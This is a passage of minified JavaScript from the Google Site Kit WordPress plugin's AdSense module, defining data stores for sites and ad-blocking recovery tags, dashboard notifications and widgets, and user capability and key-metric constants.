ki="RESET_SITES",ji=(0,Pt.U)({baseName:"getSites",controlCallback:({accountID:e})=>(0,Ot.get)("modules",F.Py,"sites",{accountID:e},{useCache:!1}),reducerCallback:(0,a.createReducer)((e,t,{accountID:i})=>{Array.isArray(t)&&(e.sites=e.sites||{},e.sites[i]=t)}),argsToParams:e=>({accountID:e}),validateParams:({accountID:e}={})=>{xe()(e,"accountID is required.")}}),vi={*resetSites(){const{dispatch:e}=yield a.commonActions.getRegistry();return yield{payload:{},type:ki},yield Bt.o1.clearErrors("getSites"),e(k.wl).invalidateResolutionForStoreSelector("getSites")}},bi=(0,a.createReducer)((e,t)=>{switch(t.type){case ki:{const{siteID:t,accountStatus:i,siteStatus:a,accountSetupComplete:s,siteSetupComplete:o}=e.savedSettings||{};e.sites=Di.sites,e.settings={...e.settings||{},siteID:t,accountStatus:i,siteStatus:a,accountSetupComplete:s,siteSetupComplete:o};break}}}),_i={*getSites(e){if(void 0===e||!(0,E.H)(e))return;(yield a.commonActions.getRegistry()).select(k.wl).getSites(e)||(yield ji.actions.fetchGetSites(e))}},xi={getSites(e,t){if(void 0===t)return;const{sites:i}=e;return i[t]},getSite:(0,a.createRegistrySelector)(e=>(t,i,a)=>function(e,t){if(void 0===e||void 0===t||!Array.isArray(e))return;const i=e.filter(({state:e})=>!!e),a=i.find(e=>e.domain===t.toLowerCase());return a||(i.find(e=>new RegExp(`\\.${(0,j.escapeRegExp)(e.domain)}$`,"i").test(t))||null)}(e(k.wl).getSites(i),a)),getCurrentSite:(0,a.createRegistrySelector)(e=>(t,i)=>{const a=e(N.O4).getReferenceSiteURL(),s=new URL(a);return e(k.wl).getSite(i,s.hostname)})},Ci=(0,a.combineStores)(ji,{initialState:{sites:{}},actions:vi,reducer:bi,resolvers:_i,selectors:xi}),Di=Ci.initialState,Ei=(Ci.actions,Ci.controls,Ci.reducer,Ci.resolvers,Ci.selectors,Ci);var wi=i(56768);const Zi=[/<script async src="https:\/\/fundingchoicesmessages\.google\.com\/i\/(.*?)\?ers=/],Ri="FETCH_GET_EXISTING_AD_BLOCKING_RECOVERY_TAG",Li="RECEIVE_GET_EXISTING_AD_BLOCKING_RECOVERY_TAG",Gi=(0,Pt.U)({baseName:"syncAdBlockingRecoveryTags",controlCallback:()=>(0,Ot.set)("modules",F.Py,"sync-ad-blocking-recovery-tags")}),zi={existingAdBlockingRecoveryTag:void 0},Oi={fetchGetExistingAdBlockingRecoveryTag:()=>({payload:{},type:Ri}),receiveGetExistingAdBlockingRecoveryTag:e=>(xe()(null===e||"string"==typeof e,"existingAdBlockingRecoveryTag must be a tag string or null."),{payload:{existingAdBlockingRecoveryTag:(0,E.H)(e)?e:null},type:Li}),syncAdBlockingRecoveryTags:()=>Gi.actions.fetchSyncAdBlockingRecoveryTags()},Pi={[Ri]:(0,a.createRegistryControl)(e=>async()=>{const t=e.select(N.O4).getHomeURL(),i=await(0,wi.g)({homeURL:t}),{getHTMLForURL:a}=e.resolveSelect(N.O4);for(const e of i){const t=await a(e),i=(0,wi.N)(t,Zi);if(i)return i}return null})},Bi=(0,a.createReducer)((e,{type:t,payload:i})=>{switch(t){case Li:{const{existingAdBlockingRecoveryTag:t}=i;e.existingAdBlockingRecoveryTag=t;break}}}),Ui={*getExistingAdBlockingRecoveryTag(){if(void 0===(yield a.commonActions.getRegistry()).select(k.wl).getExistingAdBlockingRecoveryTag()){const e=yield Oi.fetchGetExistingAdBlockingRecoveryTag();yield Oi.receiveGetExistingAdBlockingRecoveryTag(e)}}},Wi={getExistingAdBlockingRecoveryTag:e=>e.existingAdBlockingRecoveryTag,hasExistingAdBlockingRecoveryTag:(0,a.createRegistrySelector)(e=>()=>{const t=e(k.wl).getExistingAdBlockingRecoveryTag();if(void 0!==t)return!!t})},Hi=(0,a.combineStores)(Gi,{initialState:zi,actions:Oi,reducer:Bi,controls:Pi,resolvers:Ui,selectors:Wi}),Vi=(0,a.combineStores)(zt,Xt,ii,gi,Mi,Ni,Gt,fi,Si,Ei,Hi);Vi.initialState,Vi.actions,Vi.controls,Vi.reducer,Vi.resolvers,Vi.selectors;const Yi={"adsense-abr-success-notification":{Component:AdBlockingRecoverySetupSuccessNotification,priority:10,areaSlug:Xe.bI.DASHBOARD_TOP,viewContexts:[qe.jU],checkRequirements:async({select:e,resolveSelect:t})=>{if("ad_blocking_recovery_setup_success"!==(0,u.d)(location.href,"notification"))return!1;const{isModuleConnected:i}=t(Y.i);if(!await i(F.Py))return!1;await t(k.wl).getSettings();return e(k.wl).getAdBlockingRecoverySetupStatus()===k.Tt.SETUP_CONFIRMED}},[mt]:{Component:AnalyticsAndAdSenseAccountsDetectedAsLinkedOverlayNotification,priority:Xe.FQ.SETUP_CTA_HIGH,areaSlug:Xe.bI.OVERLAYS,groupID:Xe.He.SETUP_CTAS,viewContexts:[qe.jU,qe.Ax],isDismissible:!0,checkRequirements:async({select:e,resolveSelect:t})=>{await Promise.all([t(ae.oR).getAuthentication(),t(Y.i).getModules()]);const i=e(Y.i).isModuleConnected(F.Py),a=e(Y.i).isModuleConnected(ye.L1),s=e(ae.oR).hasAccessToShareableModule(F.Py),o=e(ae.oR).hasAccessToShareableModule(ye.L1);if(!(i&&a&&s&&o))return!1;await t(he.K9).getSettings();if(!e(he.K9).getAdSenseLinked())return!1;await t(k.wl).getSettings();const n=e(k.wl).getAccountID(),{startDate:r,endDate:l}=e(ae.oR).getDateRangeDates({offsetDays:he.f2}),c={startDate:r,endDate:l,dimensions:["pagePath","adSourceName"],metrics:[{name:"totalAdRevenue"}],dimensionFilters:{adSourceName:`Google AdSense account (${n})`},orderby:[{metric:{metricName:"totalAdRevenue"},desc:!0}],limit:1,reportID:"notifications_analytics-adsense-linked-overlay_reportArgs"},d=await t(he.K9).getReport(c);return!1===(0,kt.H5)(d)}},[St]:{Component:LinkAnalyticsAndAdSenseAccountsOverlayNotification,priority:Xe.FQ.SETUP_CTA_LOW,areaSlug:Xe.bI.OVERLAYS,groupID:Xe.He.SETUP_CTAS,viewContexts:[qe.jU],isDismissible:!0,checkRequirements:async({select:e,resolveSelect:t})=>{await Promise.all([t(Y.i).getModules()]);const i=e(Y.i).isModuleConnected(F.Py),a=e(Y.i).isModuleConnected(ye.L1);if(!i||!a)return!1;await t(he.K9).getSettings();return!1===e(he.K9).getAdSenseLinked()}}};var Fi;s().registerStore(k.wl,Vi),n().registerModule(F.Py,{storeName:k.wl,SettingsEditComponent:SettingsEdit,SettingsViewComponent:SettingsView,SettingsSetupIncompleteComponent:SettingsSetupIncomplete,SetupComponent:p.zw,DashboardMainEffectComponent,Icon:Oe.A,features:[(0,g.__)("Intelligent, automatic ad placement will be disabled","google-site-kit"),(0,g.__)("You will miss out on revenue from ads placed on your site","google-site-kit"),(0,g.__)("You will lose access to AdSense insights through Site Kit","google-site-kit")],checkRequirements:async e=>{if(!await e.resolveSelect(ae.oR).isAdBlockerActive())return;const t=e.select(k.wl).getAdBlockerWarningMessage();throw{code:ae.od,message:t,data:null}}}),(Fi=l()).registerWidget("adBlockingRecovery",{Component:le,width:Fi.WIDGET_WIDTHS.FULL,priority:1,wrapWidget:!1,modules:[F.Py]},[m.AREA_MAIN_DASHBOARD_MONETIZATION_PRIMARY]),Fi.registerWidget(ae.p3,{Component:Ve,width:Fi.WIDGET_WIDTHS.QUARTER,priority:1,wrapWidget:!1,modules:[F.Py,ye.L1],isActive:e=>{const t=!e(ae.oR).isAuthenticated();if(!e(ae.oR).isKeyMetricActive(ae.p3))return!1;const i=e(he.K9).getAdSenseLinked();return!(t&&!i)}},[m.AREA_MAIN_DASHBOARD_KEY_METRICS_PRIMARY]),Fi.registerWidget("adBlockerWarning",{Component:se,width:Fi.WIDGET_WIDTHS.FULL,priority:1,wrapWidget:!1,modules:[F.Py]},[m.AREA_MAIN_DASHBOARD_MONETIZATION_PRIMARY]),Fi.registerWidget("adsenseModuleOverview",{Component:ze,width:Fi.WIDGET_WIDTHS.FULL,priority:2,wrapWidget:!1,modules:[F.Py]},[m.AREA_MAIN_DASHBOARD_MONETIZATION_PRIMARY]),Fi.registerWidget("adsenseConnectCTA",{Component:me,width:[Fi.WIDGET_WIDTHS.FULL],priority:2,wrapWidget:!1,modules:[F.Py]},[m.AREA_MAIN_DASHBOARD_MONETIZATION_PRIMARY]),Fi.registerWidget("adsenseTopEarningPagesGA4",{Component:ke,width:[Fi.WIDGET_WIDTHS.HALF,Fi.WIDGET_WIDTHS.FULL],priority:3,wrapWidget:!1,modules:[F.Py,ye.L1]},[m.AREA_MAIN_DASHBOARD_MONETIZATION_PRIMARY]),function(e){for(const t in Yi)e.registerNotification(t,Yi[t])}(d())},96820:(e,t,i)=>{"use strict";i.d(t,{A:()=>n});var a=i(63696),s=i(50539),o=i(4169);function n(e,t,i){const{setWidgetState:n,unsetWidgetState:r}=(0,s.useDispatch)(o.aO);(0,a.useEffect)(()=>(n(e,t,i),()=>{r(e,t,i)}),[e,t,i,n,r])}},97345:(e,t,i)=>{"use strict";i.d(t,{$8:()=>n,$Q:()=>m,BT:()=>w,CQ:()=>v,DF:()=>Y,GM:()=>j,GT:()=>A,HA:()=>G,HD:()=>u,HP:()=>E,J5:()=>O,JF:()=>_,JK:()=>h,Ml:()=>I,SS:()=>Z,UF:()=>d,UY:()=>W,Vl:()=>R,W6:()=>V,Xq:()=>b,YQ:()=>x,Yw:()=>U,dV:()=>D,dX:()=>k,ej:()=>c,em:()=>o,ep:()=>T,fu:()=>N,gC:()=>M,hz:()=>p,jx:()=>g,lV:()=>l,nH:()=>z,oR:()=>a,od:()=>r,p3:()=>y,pG:()=>S,qv:()=>s,qy:()=>C,t1:()=>H,t7:()=>B,tB:()=>f,tK:()=>P,u_:()=>L});const a="core/user",s="connected_url_mismatch",o="__global",n="temporary_persist_permission_error",r="adblocker_active",l=["weekly","monthly","quarterly"],c="googlesitekit_authenticate",d="googlesitekit_setup",g="googlesitekit_view_dashboard",u="googlesitekit_manage_options",m="googlesitekit_read_shared_module_data",p="googlesitekit_manage_module_sharing_options",I="googlesitekit_delegate_module_sharing_management",h="googlesitekit_update_plugins",y="kmAnalyticsAdSenseTopEarningContent",A="kmAnalyticsEngagedTrafficSource",M="kmAnalyticsLeastEngagingPages",N="kmAnalyticsNewVisitors",f="kmAnalyticsPopularAuthors",T="kmAnalyticsPopularContent",S="kmAnalyticsPopularProducts",k="kmAnalyticsReturningVisitors",j="kmAnalyticsTopCities",v="kmAnalyticsTopCitiesDrivingLeads",b="kmAnalyticsTopCitiesDrivingAddToCart",_="kmAnalyticsTopCitiesDrivingPurchases",x="kmAnalyticsTopDeviceDrivingPurchases",C="kmAnalyticsTopConvertingTrafficSource",D="kmAnalyticsTopCountries",E="kmAnalyticsTopPagesDrivingLeads",w="kmAnalyticsTopRecentTrendingPages",Z="kmAnalyticsTopTrafficSource",R="kmAnalyticsTopTrafficSourceDrivingAddToCart",L="kmAnalyticsTopTrafficSourceDrivingLeads",G="kmAnalyticsTopTrafficSourceDrivingPurchases",z="kmAnalyticsPagesPerVisit",O="kmAnalyticsVisitLength",P="kmAnalyticsTopReturningVisitorPages",B="kmSearchConsolePopularKeywords",U="kmAnalyticsVisitsPerVisitor",W="kmAnalyticsMostEngagingPages",H="kmAnalyticsTopCategories",V=[y,A,M,N,f,T,S,k,H,j,v,b,_,x,C,D,w,Z,R,z,O,P,U,W,H],Y=[...V,B]},97513:(e,t,i)=>{"use strict";i.d(t,{Fo:()=>o,Lg:()=>n,Qb:()=>s,dv:()=>l,mp:()=>r});var a=i(24355);const s="xlarge",o="desktop",n="tablet",r="small";function l(){const e=(0,a.SO)();return e>1280?s:e>960?o:e>600?n:r}},99162:(e,t,i)=>{"use strict";i.d(t,{RR:()=>AdBlockingRecoveryApp,zw:()=>SetupMain_SetupMain});var a=i(63696),s=i(89351),o=i(19790),n=i(10740),r=i(51568),l=i(82871),c=i(50539),d=i(49383),g=i(38432),u=i(85172),m=i(83880),p=i(62688),I=i.n(p),h=i(4452),y=i.n(h),A=i(63972);const M={UPCOMING:"upcoming",ACTIVE:"active",COMPLETED:"completed"};var N=i(62540);function Stepper({children:e,activeStep:t,className:i}){const s=a.Children.count(e);function o(e,t){switch(t){case M.UPCOMING:return(0,l.sprintf)(/* translators: 1: The number of the current step. 2: The total number of steps. */ /* translators: 1: The number of the current step. 2: The total number of steps. */ (0,l.__)("Step %1$s of %2$s (upcoming).","google-site-kit"